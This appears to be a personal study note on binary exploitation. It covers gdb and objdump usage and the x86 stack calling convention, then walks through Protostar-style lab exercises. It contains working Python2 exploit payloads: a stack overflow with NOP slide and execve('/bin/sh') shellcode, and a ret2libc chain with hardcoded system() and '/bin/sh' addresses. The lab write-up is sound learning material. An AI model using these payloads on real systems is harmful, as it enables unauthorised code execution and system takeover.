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Security Learning Note

Binary Exploitation

Learning Sources

Before Cracking

  • file: determine file type
  • strings: print the sequences of printable characters in files


  • set disassembly-flavor intel: a more readable style
  • disassemble main: display all assembler instructions of the main function
  • break *address: for example, break *main
  • si: step one instruction
  • info registers:
    • rip / eip: instruction pointer (program counter)
    • rsp / esp: stack pointer
    • eax: the first 32 bits of the 64-bit rax register
  • set $eax=0: set the register eax to 0
  • info proc mapping: report the memory address space ranges accessible in a process.
  • x command: examine the content of a memory address reference
    • x/4wx $esp
  • define a "hook", for example, hook-stop will execute when the program stop at a breakpoint:
    (gdb) define hook-stop
    Type commands for definition of "hook-stop".
    End with a line saying just "end".
    >info registers
    >x/32wx $esp+0x1c
    >x/2i $eip


  • objdump -d $FILENAME: disassembler
  • objdump -x $FILENAME: print header information
  • objdump -t $FILENAME: print the symbol table entries, can be used to find the address of a function

strace & ltrace

  • strace: trace system calls
  • ltrace: trace library calls

Other useful tools

  • Radare2, Ghidra, ...

Parser Differential

  • Use fuzzing technique to make a program failed to be parsed by gdb, radare2, or whatever but able to be executed by execve.


  • ebp / rbp: contains the address of the bottom of the stack
  • esp / rsp: contains the address the top of the stack

Calling Convention:

  1. push the paramters to be passed on the stack (in reverse order)
  2. call instruction
    1. push the return address on the stack
    2. set eip (rip) to the address of the callee
  3. push the value of ebp on the stack
  4. set ebp to the value of esp
  5. align the value of esp (bitwise and with 0xfffffff0)
  6. substract esp by a certain value to create the stack frame

End of a Function

  1. leave instruction: mov esp, ebp then pop ebp
  2. ret instruction (the invert of call instruction): get and set the next instruction pointer, which is on the top of the stack



  1. First analyze the disassembled code:
    0x080483c4 <main+0>:    push   ebp
    0x080483c5 <main+1>:    mov    ebp,esp
    0x080483c7 <main+3>:    and    esp,0xfffffff0
    0x080483ca <main+6>:    sub    esp,0x50
    0x080483cd <main+9>:    lea    eax,[esp+0x10]
    0x080483d1 <main+13>:   mov    DWORD PTR [esp],eax
    0x080483d4 <main+16>:   call   0x80482e8 <gets@plt>
    0x080483d9 <main+21>:   leave  
    0x080483da <main+22>:   ret    
    The goal is to smash the stack frame of gets and redirect the return address to execve("/bin/sh") at the return of main function.
  2. From the assembly code, we know the buffer starts at $esp+0x10, whose value can be found by GDB.
  3. To know the size of padding, we need to know $esp when 0x080483da <main+22>: ret is executed. We can find it out by setting a breakpoint at ret and x/wx $esp. Now we know that the padding should be 76 bytes long. (actually the last 4 bytes is the old ebp, but it does not matter here)
  4. determine the value of eip: Where to place our shell code? Here we choose to place it right after the position of eip
  5. However, the address space may not be the same every time since the data pushed on the stack can be different (e.g. environment variables). To address this issue, we can find a way to know the exact value by the other code in the binary. However, we can also use NOP(opcode: 0x90) slide to make sure that eip points to the code we control.
    • make the eip point to the middle of the NOP slide
  6. add shellcode: copy from shell-storm


use int3(opcode: 0xCC) instruction to debug shellcode


python | /opt/protostar/bin/stack5 does not work because stack5's stdin has been redirected to the stdout of When the shell gets executed, it reads nothing but the EOF of the stdout of As a result, the shell does not read any input from our terminal. A possible solution is using cat to "continue" the pipe and pipe our commands into the stdin of the shell.

(python; cat) | /opt/protostar/bin/stack5

Python2 Script:

import struct

padding = 'A' * 76
eip = struct.pack('I', 0xbffff6e0+40)
nopslide = '\x90' * 100
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
print padding + eip + nopslide + shellcode


In this task, the return address is restricted so we cannot just set it to an address on the stack. Instead, we take use of the code of libc. The goal is to call system() with /bin/sh as the argument. This is a attack method called ret2libc.

  • How to call system()

    1. push the argument ("/bin/sh") on the stack
    2. push the return address on the stack
    3. jump to system
  • Thus, when ret instruction jump to system, the stack should be as follow:

     return address after system  <---- esp
         address of "/bin/sh"

  • And our buffer overflow should make the stack be as follow:
         address of system
     return address after system 
         address of "/bin/sh"
  • script:

    import struct
    padding = 'A' * 80
    system = struct.pack('I', 0xb7ecffb0)
    return_after_system = 'AAAA'
    bin_sh = struct.pack('I', 0xb7fb63bf)
    print padding + system + return_after_system + bin_sh

  • find the address of system: in GDB type p system

  • find the address of "/bin/sh"
    1. use environment variables
    2. find in libc: string -a -t x /lib/ | grep "/bin/sh" + the start address of libc in the program's memory mapping.